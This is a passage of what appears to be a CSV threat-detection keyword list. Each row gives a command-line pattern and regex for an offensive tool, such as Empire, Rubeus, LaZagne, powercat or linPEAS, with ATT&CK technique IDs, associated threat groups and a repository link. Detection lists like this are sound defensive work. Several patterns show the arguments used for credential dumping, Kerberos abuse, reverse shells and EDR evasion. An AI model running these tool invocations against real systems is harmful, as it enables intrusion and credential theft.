Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* kerbrute.py*",".{0,1000}\skerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* --key examples/conspicuous.priv --isconspicuous*",".{0,1000}\s\-\-key\sexamples\/conspicuous\.priv\s\-\-isconspicuous.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --key PPLBlade*",".{0,1000}\s\-\-key\sPPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* keylogger *",".{0,1000}\skeylogger\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* --keyword * --check --ocr * --alexa*",".{0,1000}\s\-\-keyword\s.{0,1000}\s\-\-check\s\-\-ocr\s.{0,1000}\s\-\-alexa.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "* -KillDate *",".{0,1000}\s\-KillDate\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -KillDays *",".{0,1000}\s\-KillDays\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* killer.cpp *",".{0,1000}\skiller\.cpp\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* killer.exe*",".{0,1000}\skiller\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* kimi.py *",".{0,1000}\skimi\.py\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "* KittyStager*",".{0,1000}\sKittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "* klist * /service:*",".{0,1000}\sklist\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* knx-gateway-discover.nse*",".{0,1000}\sknx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* knx-gateway-info.nse*",".{0,1000}\sknx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* KRB hijacking module *",".{0,1000}\sKRB\shijacking\smodule\s.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "* krb5-enum-users.nse*",".{0,1000}\skrb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --krbpass * --krbsalt * -t * --escalate-user *",".{0,1000}\s\-\-krbpass\s.{0,1000}\s\-\-krbsalt\s.{0,1000}\s\-t\s.{0,1000}\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --krbpass *--krbsalt*",".{0,1000}\s\-\-krbpass\s.{0,1000}\-\-krbsalt.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* KRBUACBypass*",".{0,1000}\sKRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "* -l nmapRssuilt.xml -v*",".{0,1000}\s\-l\snmapRssuilt\.xml\s\-v.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "* -l -p * -e cmd -ge*",".{0,1000}\s\-l\s\-p\s.{0,1000}\s\-e\scmd\s\-ge.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "* l$a$$Pid *",".{0,1000}\sl\$a\$\$Pid\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "* Ladon.ps1*",".{0,1000}\sLadon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* Ladon.py*",".{0,1000}\sLadon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* Lalin.sh*",".{0,1000}\sLalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "* laps.py *--ldapserver*",".{0,1000}\slaps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "* laps.py *-u * -p *",".{0,1000}\slaps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "* LaZagne.py *",".{0,1000}\sLaZagne\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* laZagne.py*",".{0,1000}\slaZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "* lazypariah*",".{0,1000}\slazypariah.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "* ldap * --gmsa *dump*",".{0,1000}\sldap\s.{0,1000}\s\-\-gmsa\s.{0,1000}dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* ldap * --trusted-for-delegation*",".{0,1000}\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* ldap * -u * -p * --admin-count*",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* ldap * -u * -p * -M whoami *",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\swhoami\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --ldap servicePrincipalName=* --domain * --user * --pass *",".{0,1000}\s\-\-ldap\sservicePrincipalName\=.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* ldap-brute.nse*",".{0,1000}\sldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-novell-getpass.nse*",".{0,1000}\sldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldapper.py*",".{0,1000}\sldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "* ldapph.db*",".{0,1000}\sldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "* ldap-rootdse.nse*",".{0,1000}\sldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-search.nse*",".{0,1000}\sldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldapsearch-ad.py*",".{0,1000}\sldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* --ldapusername * --ldappassword *",".{0,1000}\s\-\-ldapusername\s\s.{0,1000}\s\-\-ldappassword\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* ldeep_dump *",".{0,1000}\sldeep_dump\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "* letmein.ps1*",".{0,1000}\sletmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* lexmark-config.nse*",".{0,1000}\slexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lfs_injection.exe*",".{0,1000}\slfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* libpwn.c*",".{0,1000}\slibpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* libpwn.so*",".{0,1000}\slibpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* link smb * merlinPipe*",".{0,1000}\slink\ssmb\s.{0,1000}\smerlinPipe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "* linpeas.sh *",".{0,1000}\slinpeas\.sh\s.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* linpeas.sh*",".{0,1000}\slinpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -linpeas=http://*",".{0,1000}\s\-linpeas\=http\:\/\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* -linpeas=http://127.0.0.1/linpeas.sh*",".{0,1000}\s\-linpeas\=http\:\/\/127\.0\.0\.1\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 